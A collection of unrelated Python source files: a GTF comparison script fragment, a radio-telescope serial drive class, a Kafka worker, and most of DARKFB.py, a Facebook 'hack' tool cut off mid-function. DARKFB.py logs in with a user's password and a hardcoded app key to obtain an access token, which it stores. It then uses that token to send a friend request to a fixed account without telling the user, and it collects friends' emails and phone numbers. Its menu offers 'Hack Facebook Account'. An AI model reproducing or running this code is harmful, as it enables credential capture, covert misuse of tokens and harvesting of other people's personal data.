parser.add_argument("-r", "--ref-gtf", dest='ref_gtf_file',
help='Reference GTF file to compare against')
parser.add_argument("-t", "--test-gtf", dest='test_gtf_file',
help='GTF file used for comparison')
args = parser.parse_args()
# set logging level
if args.verbose:
level = logging.DEBUG
else:
level = logging.INFO
#establish CPAT associated files
cpat_dict = cpat_init(args.cpat, args.cpat_gen, args.cpat_spec)
if not args.ref_gtf_file or not args.test_gtf_file:
logging.error('Please provide both reference and test GTF files')
return 1
if args.cpat:
if not args.cpat_gen:
logging.error('A genome FASTA must be provided (with "--cpat-genome" flag) when using "--cpat" flag')
return 1
logging.basicConfig(level=level,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logging.info("TACO Reference Comparison Tool" )
logging.info("----------------------------------")
# show parameters
logging.info("Parameters:")
logging.info("verbose logging: %s" % (args.verbose))
logging.info("number of cores: %s" % (args.num_cores))
logging.info("reference gtf file: %s" % (args.ref_gtf_file))
logging.info("test gtf file: %s" % (args.test_gtf_file))
logging.info("output directory: %s" % (args.output_dir))
logging.info("run cpat: %s" % (args.cpat))
logging.info("----------------------------------")
# check command line parameters
if not os.path.exists(args.ref_gtf_file):
parser.error("Reference GTF file %s not found" % (args.ref_gtf_file))
if not os.path.exists(args.test_gtf_file):
parser.error("Test GTF file %s not found" % (args.test_gtf_file))
if not os.path.exists(args.output_dir):
logging.info("Creating output directory '%s'" % (args.output_dir))
os.makedirs(args.output_dir)
tmp_dir = os.path.join(args.output_dir, 'TMP')
if not os.path.exists(args.output_dir):
os.makedirs(tmp_dir)
compare_assemblies(args.ref_gtf_file, args.test_gtf_file,
tmp_dir, args.output_dir, cpat_dict, args.num_cores)
shutil.rmtree(tmp_dir)
return 0
if __name__ == "__main__":
sys.exit(main())
|
drive.py
|
"""
acreroad_1420 Drive software
Software designed to drive the 1420 MHz telescope on the roof of the
Acre Road observatory. This class interacts with "qp", the telescope
drive software by Norman Gray (https://bitbucket.org/nxg/qp) via a
serial (USB) interface.
The serial interfacing is done through pySerial.
Parameters
----------
device : str
The name of the unix device which the drive is connected to
port : int
The port number of the drive
simulate : bool
A boolean flag to set the drive in simulation mode
(the class does not connect to the controller in simulation mode)
"""
import time
import re, datetime, time
from . import CONFIGURATION as config
import numpy as np
import astropy
from astropy.coordinates import SkyCoord, ICRS, EarthLocation, AltAz
import astropy.units as u
import serial
from astropy.time import Time
import threading
from os.path import expanduser, isfile, join
import os.path
import logging
class Drive():
# The vocabulary from the qt package.
# This should probably be moved to a file in its own right to help
# make the drive more generic
vocabulary = {
"DRIVE_UP" : "gU",
"DRIVE_DOWN": "gD",
"DRIVE_EAST": "gE",
"DRIVE_WEST": "gW",
"DRIVE_HOME": "gH",
"SET_SPEED" : "ta {}",
"CALIBRATE" : "c {:f} {:f}",
"STOP" : "x",
"STOW" : "X",
"SET_TIME" : "T {:d} {:d} {:d} {:d} {:d} {:d}",
# status command, s, not currently implemented this way
"STATUS_CAD": "s {:d}",
"GOTO_HOR" : "gh {:f} {:f}",
"GOTO_EQ" : "ge {:f} {:f}",
# Nudges
"NUDGE_UP" : "nu {:f}",
"NUDGE_DOWN": "nd {:f}",
"NUDGE_WEST": "nw {:f}",
"NUDGE_EAST": "ne {:f}",
# Setup
"SETUP" : "O {:f} {:f} {:f} {:f} {:f} {:f} {:f}",
# QUEUE
"QUEUE" : "q",
# TRACKING
# disabled as of qp v0.7b2
#"TRACK_SID" : "ts",
#"TRACK_RA" : "ts {:f}",
"TRACK_AZ" : "ta {:f}",
}
MAX_SPEED = 0.5
sim = 0
acre_road = EarthLocation(lat=55.9024278*u.deg, lon=-4.307582*u.deg, height=61*u.m)
# Position variables
ra = 0
dec = 0
az = 26
alt = 3
# Calibration variables
#az_home = 90.0
#el_home = -8.5
# Operational flags
calibrating = False
homing = False
ready = False
tracking = False
slewing = False
# String formats
com_format = re.compile("[A-Za-z]{1,2} ?([-+]?[0-9]{0,4}\.[0-9]{0,8} ?){0,6}") # general command string format
cal_format = re.compile("[0-9]{3} [0-9]{3}") # calibration string format
#stat_format = re.compile(r"\b(\w+)\s*=\s*([^=]*)(?=\s+\w+\s*:|$)")
stat_format = re.compile(r"(?=\s+)([\w_]+)\s*=\s*([\d_:\.T]+)")
def __init__(self, device=None, baud=None, timeout=3, simulate=0, calibration=None, location=None, persist=True, homeonstart=True):
"""
Software designed to drive the 1420 MHz telescope on the roof of the
Acre Road observatory. This class interacts with "qp", the telescope
drive software by Norman Gray (https://bitbucket.org/nxg/qp) via a
serial (USB) interface.
The serial interfacing is done through pySerial.
Parameters
----------
device : str
The name of the unix device which the drive is connected to
baud : int
The baud-rate of the connection.
timeout : int
The time, in seconds, to wait before timing-out. Default is 2 seconds.
simulate : bool
A boolean flag to set the drive in simulation mode
(the class does not connect to the controller in simulation mode)
calibration : str
The calibration figures which have been returned by a previous run of the *calibrate()* method.
The default is `None` which forces a calibration run to be carried-out.
location : astropy.coordinates.EarthLocation object
The Earth location of the telescope. The default is `None`, which sets the location as Acre Road Observatory, Glasgow.
Examples
--------
>> from acreroad_1420 import drive
>>> connection = drive.Drive('/dev/tty.usbserial', 9600, simulate=1)
"""
self.config = config
# Setup the logger
#
logfile = config.get('logs', 'logfile')
logging.basicConfig(filename=logfile,
format='[%(levelname)s] [%(asctime)s] [%(message)s]',
level=logging.DEBUG)
#
# Fetch the sky position which corresponds to the 'home' position of the telescope
#
homealtaz = config.get('offsets', 'home').split()
self.az_home, self.el_home = float(homealtaz[0]), float(homealtaz[1])
# Add a dirty hack to easily calibrate the telescope in software
absaltaz = config.get('offsets', 'absolute').split()
self.az_abs, self.el_abs = float(absaltaz[0]), float(absaltaz[1])
#
# Pull the location of the telesope in from the configuration file if it isn't given as an argument to the
# class initiator.
#
if not location:
logging.info("The observatory location was not provided, so it will be loaded from the config file")
observatory = config.get('observatory', 'location').split()
location = EarthLocation(lat=float(observatory[0])*u.deg, lon=float(observatory[1])*u.deg, height=float(observatory[2])*u.m)
self.sim = self.simulate = simulate
self.timeout = timeout
self.location = location
self.targetPos = SkyCoord(AltAz(self.az_abs*u.deg,self.el_abs*u.deg,obstime=self.current_time,location=self.location))
#
# Initialise the connection to the arduino Note that this can
# be complicated by the ability of the device name to change
# when disconnected and reconnected, so a search is
# required. This is now handled by the `_openconnection()`
# method.
if not baud:
# Get the target baudrate from the config file
baud = config.get("arduino", "baud")
if not device:
device = config.get('arduino','dev')
if not self.sim:
self._openconnection(device, baud)
logging.info("Drive controller connected.")
# Give the Arduino a chance to power-up
time.sleep(1)
if not calibration:
try:
calibration = config.get('calibration', 'speeds')
except: pass
self.span = float(config.get("offsets", "span"))
self.calibration = calibration
self.calibrate(calibration)
#self.calibrate()
# Set the format we want to see status strings produced in; we just want azimuth and altitude.
#self.set_status_cadence(200)
#self.set_status_message('za')
self.target = (self.az_home, self.el_home)
# Set the Arduino clock
self.setTime()
# Tell the Arduino where it is
#self.setLocation(location)
# Home on start
logging.info("Homing the telescope.")
if homeonstart:
self.home()
if not self.sim:
self.listen_thread = threading.Thread(target=self._listener)
self.listen_thread.daemon = True
self.listen_thread.start()
self.ready = True
self.track()
self.stop_track()
@property
def current_time(self):
"""
Return the current UTC time as an AstroPy time object.
"""
return Time(datetime.datetime.utcnow(), location = self.location)
@property
def current_time_local(self):
"""
return the current local time
"""
return Time( datetime.datetime.now(), location = self.location)
def _openconnection(self, device, baud):
from serial import SerialException
import serial
try:
self.ser = serial.Serial(device, baud, timeout=self.timeout)
logging.info("Drive connected on {} at {} baud".format(device, baud))
except SerialException:
# The arduino might be connected, but it's not at that
# device address, so let's have a look around.
import serial.tools.list_ports
ports = list(serial.tools.list_ports.comports())
for p in ports:
if "ACM" in p[0]:
device = p[0]
break
self._openconnection(device, baud)
def _command(self, string):
"""
Passes commands to the controller.
"""
# Check that the command string is a string, and that it
# matches the format required for a command string
string = str(string)
string = string+"\n"
if not self.com_format.match(string):
logging.error("Invalid command rejected: {}".format(string))
raise ValueError(string+" : This string doesn't have the format of a valid controller command.'")
if self.sim:
print("In simulation mode, command ignored.")
return 1
else:
# Pass the command to the Arduino via pyserial
logging.debug("Command: {}".format(string))
self.ser.write(string.encode('ascii'))
return 1
def _listener(self):
while True:
try:
line = self.ser.readline()
self.parse(line)
except Exception as e:
print str(e)
logging.error("Parser error, continuing. \n {}".format(line))
time.sleep(0.5)
return
def _stat_update(self, az, alt):
"""
Update the internal record of the telescope's position.
This is normally parsed from one of the status strings by the parser
method.
Parameters
----------
az : float, degrees
The azimuth of the telescope.
This must be provided in degrees.
alt : float, degrees
The altitude of the telescope.
This must also be provided in degrees.
Returns
-------
None
Notes
-----
Due to oddities in how the telescope seems to be reporting the
altitude, this function currently calculates the appropriate modulus
for the altitude if it is greater than 90 deg.
This should really be looked into more carefully.
* TODO Investigate erratic altitude reports.
"""
# Check that the values are within an acceptable range
# Otherwise modulate them.
if az > 360 : az = az % 360
if alt > 90 : alt = alt % 90
self.az, self.alt = az, alt
def parse(self, string):
#print string
# Ignore empty lines
if len(string)<1: return 0
logging.debug(string)
# A specific output from a function
if string[0]==">":
#print string
if string[1]=="S": # This is a status string of keyval pairs
# This currently seems to be broken, so pass
pass
# print("string", string[2:])
d = string[2:].split()
out = {}
for field in d:
key, val = field.split("=")
out[key] = val
#print("d", out)
try:
#print "Status string"
az, alt = out['Taz'], out['Talt']
except KeyError:
logging.error('Key missing from the status output {}'.format(out))
return out
if string[1:3] == "g E":
# Telescope has reached an endstop and will need to be homed before continuing.
logging.info("The telescope appears to have hit an end-stop.")
#self.home()
#logging.info("Rehoming the telescope.")
#self._command(self.vocabulary["QUEUE"])
#logging.info("After re-homing the telescope will attempt to move to the requested location again.")
#self.goto(self.target)
if string[1:4] == "g A":
# This is the flag confirming that the telescope has reached the destination.
self.slewing = False
logging.info("The telescope has reached {}".format(string[3:]))
if string[1]=='c':
# This is the return from a calibration run
logging.info("Calibration completed. New values are {}".format(string[2:]))
self.calibrating=False
self.config.set('offsets','calibration',string[2:])
self.calibration = string[2:]
#print string
else:
logging.info(string[1:])
# A status string
elif string[0]=="s" and len(string)>1:
# Status strings are comma separated
d = string[2:].strip('\n').split(",")
if len(d) > 3: return
try:
#try:
az, alt = self._parse_floats(d[1]), self._parse_floats(d[2])
#az = np.pi - az
self._stat_update( self._r2d(az), self._r2d(alt) )
except:
logging.error(d)
logging.info("{} az, {} alt".format(az, alt))
if len(d)<3: return
az, alt = self._parse_floats(d[1]), self._parse_floats(d[2])
#print az, type(az)
#print alt, self._r2d(az), az
self._stat_update( self._r2d(az), self._r2d(alt) )
# print self._parse_floats(d[1]), self._parse_floats(d[2])
pass
#except IndexError:
# Sometimes (early on?) the drive appears to produce
# an incomplete status string. These need to be
# ignored otherwise the parser crashes the listener
# process.
# pass
return d
elif string[0]=="a":
if string[1]=="z" or string[1]=="l":
# This is an azimuth or an altitude click, update the position
d = string.split(",")
#print string, d
#print d
self._stat_update(self._r2d(self._parse_floats(d[3])), self._r2d(self._parse_floats(d[4])))
elif string[0]=="!":
# This is an error string
logging.error(string[1:])
print "Error: {}".format(string[1:])
elif string[0]=="#":
logging.info(string[1:])
pass
#print string
# # This is a comment string
# if string[1:18] == "FollowingSchedule":
# # This is a scheduler comment
# d = string.split()
# if not d[1][0] == "o":
# pass
# pass
else: pass
def slewSuccess(self):
"""
Checks if the slew has completed. This /should/ now be
entirely handled by qp, and all we need to do is to
check that the slewing flag is false.
"""
if type(self.targetPos) is tuple:
(cx, cy) = self.targetPos
#if cx > 90.0: cx -= (cx - 90)
self.targetPos = SkyCoord(AltAz(cx*u.deg,cy*u.deg,obstime=self.current_time,location=self.location))
cx,cy = self.status()['az'], self.status()['alt']
print cx, cy
self.realPos = SkyCoord(AltAz(az=cx*u.deg,alt=cy*u.deg,obstime=self.current_time,location=self.location))
d = 0.5 * u.degree
if self.targetPos.separation(self.realPos) < d:
return True
else:
return False
def _r2d(self, radians):
"""
Converts radians to degrees.
"""
degrees = radians*(180/np.pi)
#if degrees < 0 : 180 - degrees
return degrees%360
def _d2r(self, degrees):
"""
Converts degrees to radians.
"""
radians = degrees*(np.pi/180)
if radians < 0 : radians = radians #(np.pi-radians)
return radians%(2*np.pi)
def _parse_floats(self, string):
"""
Parses the float outputs from the controller in a robust way which
allows for the exponent to be a floating-point number, which
is not supported by Python.
Parameters
----------
string : str
A string containing the float which needs to be cast.
Returns
-------
float
A float which is in the correct format for Python.
"""
if string == '0e0':
return 0.0
parts = string.split('e')
if len(parts)==2:
return float(parts[0]) * 10**float(parts[1])
else:
return float(parts[0])
def panic(self):
"""
Stops the telescope drives.
"""
return self._command("x")
def set_speed(self, speed):
"""
Set the speed of the drive in radians / second.
Parameters
----------
speed : float [rad/sec]
The physical angular speed which the motor should attempt to
drive at.
"""
command = self.vocabulary['SET_SPEED']
if speed > self.MAX_SPEED:
print("{} is greater than the maximum speed ({})".format(speed, self.MAX_SPEED))
return
else:
# The command can have the speed added using a format command
return self._command(command.format(speed))
def move(self, direction):
"""
Start moving the telescope in a specified direction.
Parameters
----------
direction : {left, right, up, down}
Direction to move the telescope.
"""
directions = ["west", "east", "up", "down"]
if direction not in directions:
print("Unknown direction provided.")
return None
else:
commands = {"east": "DRIVE_EAST", "west": "DRIVE_WEST",
"up" : "DRIVE_UP", "down": "DRIVE_DOWN"}
# Find the command which corresponds to the correct
# vocabulary command
command = commands[direction]
if command in self.vocabulary:
print(self.vocabulary[command])
return self._command(self.vocabulary[command])
def change_offset(self, direction, amount):
"""
Change the software-defined offsets for this script (and not for qt).
Parameters
----------
direction : str {"azimuth", "altitude"}
The axis along which the correction must be made.
amount : float
The change of correction to be applied, in degrees.
"""
directions = ['azimuth', 'altitude']
if direction not in directions:
print("I do not understand the direction {}".format(direction))
else:
if direction == directions[0]: # azimuth
self.az_abs += amount
elif direction == directions[1]: #altitude
self.el_abs += amount
# Set the new calibration on the motor
print("New calibration is {}az {}alt".format(self.az_home, self.el_home))
# Write the new calibration to the config file
self.config.set('offsets','absolute',"{} {}".format(self.az_home, self.el_home))
return
#return self._command(self.vocabulary['CALIBRATE'].format(self.az_home, self.el_home))
def set_status_cadence(self, interval):
"""
Sets the cadence of the status messages from the controller.
"""
return self._command("s {}".format(int(interval)))
def set_status_message(self, message):
"""
Determines the output of the status messages produced by the controller.
"""
return self._command("s {}".format(message))
def calibrate(self, values=None):
"""
Carries-out a calibration run, returning two numbers which are offsets, or sets the calibration if known values are provided.
Parameters
----------
values : str
The calibration values produced by a previous calibration run of the telescope, provided in the format "nnn nnn"
"""
if self.sim:
return ">c 000 000"
if values:
# Check the format of the values string.
if self.cal_format.match(values):
return self._command(self.vocabulary["CALIBRATE"].format(values[0], values[1]))
#return self._command("c "+values)
else:
self.calibrating=True
return self._command("c")
pass
def setTime(self):
"""
Sets the time on the drive controller's clock to the current system time.
"""
time = datetime.datetime.utcnow()
command_str = "T {} {} {} {} {} {:.4f}".format(time.year, time.month, time.day, time.hour, time.minute, time.second)
return self._command(command_str)
def setLocation(self, location=None, dlat=0, dlon=0, azimuth=None, altitude=None):
"""
Sets the location of the telescope.
Parameters
----------
location : astropy.coordinates.EarthLocation object
The observatory location
azimuth : float
The azimuth location in radians of the home position
altitude : float
The altitude location in radians of the home position
"""
azimuth, altitude = self.az_home, self.el_home
if not location:
# Assume we're at Acre Road, in Glasgow
location = self.acre_road
latitude = location.latitude.value #* (180/np.pi)
longitude = location.longitude.value #* (180/np.pi)
azimuth = azimuth*(np.pi/180)
altitude = altitude*(np.pi/180)
# Construct the command
command_str = "O {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f}".format(latitude, longitude, dlat, dlon, azimuth, altitude, self.span)
return self._command(command_str)
def goto(self, skycoord, track=False):
"""
Moves the telescope to point at a given sky location, and then commands the drive to track the point.
Parameters
----------
skycoord : astropy.SkyCoord object
An astropy SkyCoord object which contains the sky location to slew to.
This can also be a list of locations which the telescope will slew to sequentially.
"""
if not type(skycoord)==astropy.coordinates.sky_coordinate.SkyCoord:
raise ValueError("The sky coordinates provided aren't an astropy SkyCoord object!'")
self.target = skycoord
# Stop any ongoing tracking
self.stop_track()
self.slewing = True
# To do : We need to make sure that this behaves nicely with a
# list of coordinates as well as single ones.
time = Time.now()
skycoord = skycoord.transform_to(AltAz(obstime=time, location=self.location))
logging.info("Going to {0.az} {0.alt}".format(skycoord))
self.target = skycoord
self.status()
# construct a command string
#self._command(self.vocabulary["QUEUE"])
command_str = "gh {0.az.radian:.2f} {0.alt.radian:.2f}".format(skycoord)
# pass the slew-to command to the controller
if self._command(command_str):
print "Command received."
self.slewing = True
else:
self.slewing = True
raise ControllerException("The telescope has failed to slew to the requested location")
if track:
self.track()
def track(self, interval = 60):
"""Make the drive track an object.
Notes
-----
At the moment qp can't handle tracking correctly, and so this
is implemented in this module in a slightly less graceful
manner. The position of the drive is checked at regular
intervals, and is corrected to keep an object within the beam
of the telescope, by simply driving forwards.
This allows a little more flexibility than keeping the drive
running continuously at slow speed, as we can track faster
moving objects, e.g. the sun, this way. However, tracking a
very fast-moving object is probably impractical (e.g. a
satellite), and would require something more robust.
"""
#if tracking:
# self.tracking = True
# command_str = "q"
# self._command(command_str)
# command_str = "ts"
# self._command(command_str)
# else:
# self.tracking=False
# command_str = "q"
# self._command(command_str)
# command_str = "ts 0.0"
# self._command(command_str)
# Set the tracking flag
self.tracking = True
# Set-up the threaded tracking process as a timer
self.tracking_thread = threading.Timer(self._tracking, interval)
self.tracking_thread.start()
def stop_track(self):
"""
Stop on-going tracking.
"""
self.tracking_thread.cancel()
self.tracking = False
def _tracking(self):
self.tracking_thread.start()
def stop_track(self):
"""
Stop on-going tracking.
"""
self.tracking_thread.cancel()
self.tracking = False
def _tracking(self):
"""This is the function which actually carries out the heavy lifting
required for the telescope tracking to work. It's not all that
sophisticated.
"""
# Do not track if the telescope is still slewing
if not self.slewing:
self.goto(self.target)
def home(self):
"""
Slews the telescope to the home position.
"""
self.homing = True
command_str = "gH"
self._command(command_str)
home_pos = SkyCoord(AltAz(alt=self.el_home*u.deg,
az=self.az_home*u.deg,obstime=self.current_time,location=self.location))
self.target = home_pos
def stow(self):
"""
Slews the telescope to the stowing position (pointed at the zenith)
"""
zenith = self._d2r(89)
command_str = "gh 1.6 1.5"#+str(zenith)
self.target = (0.0, 90.0)
return self._command(self.vocabulary["STOW"])
def skycoord(self):
cx,cy = self.status()['az'], self.status()['alt']
realPos = SkyCoord(AltAz(az=cx*u.deg, alt=cy*u.deg,
obstime=self.current_time,
location=self.location))
return realPos
@property
def current_position(self):
return self.skycoord()
def status(self):
"""
Returns a dictionary describing the status of the telescope (e.g. its location).
Returns
-------
dict
A dictionary containing the right ascension, declination, altitude, and azimuth of the telescope.
Examples
--------
>>> from astropy.coordinates import SkyCoord
>>> from astropy.coordinates import ICRS,
>>> c = SkyCoord(frame="galactic", l="1h12m43.2s", b="+1d12m43s")
>>> self.connection.goto(c)
>>> ra = self.connection.status()['ra'].value
"""
command_str = "S"
#self._command(command_str)
#time.sleep(0.1)
return {'ra':self.ra, 'dec': self.dec, 'alt':self.alt, 'az':self.az}
class ControllerException(Exception):
pass
|
runner.py
|
import time
import json
import faust
import threading, queue
from nglp.precompute.workflow import Workflow
from nglp.config import settings
wait_time = 5
q = queue.Queue()
def process(object_oid, runner):
previous_time = object_oid["timestamp"]
time_now = int(time.time())
diff = time_now - previous_time
if diff >= wait_time:
runner.run(object_oid["oids"])
return
else:
time.sleep(wait_time - diff)
process(object_oid, runner)
def worker():
r = Runner()
while True:
item = q.get()
process(item, r)
q.task_done()
class Runner:
tasks = [
Workflow()
]
def run(self, object_ids):
for oid in object_ids:
for t in self.tasks:
t.run(oid)
app = faust.App('oids_handler', broker=settings.kafka_broker, value_serializer='json')
app.conf.web_port = 16066
topic_oid = app.topic('oids')
@app.agent(topic_oid)
async def handle_oid(stream):
async for oid in stream:
object_oid = json.loads(oid)
object_oid["timestamp"] = int(time.time())
q.put(object_oid)
threading.Thread(target=worker, daemon=True).start()
if __name__ == '__main__':
app.main()
|
DARKFB.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m EkaSaputra \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/Eka09 \x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/ka.Eka.s \x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
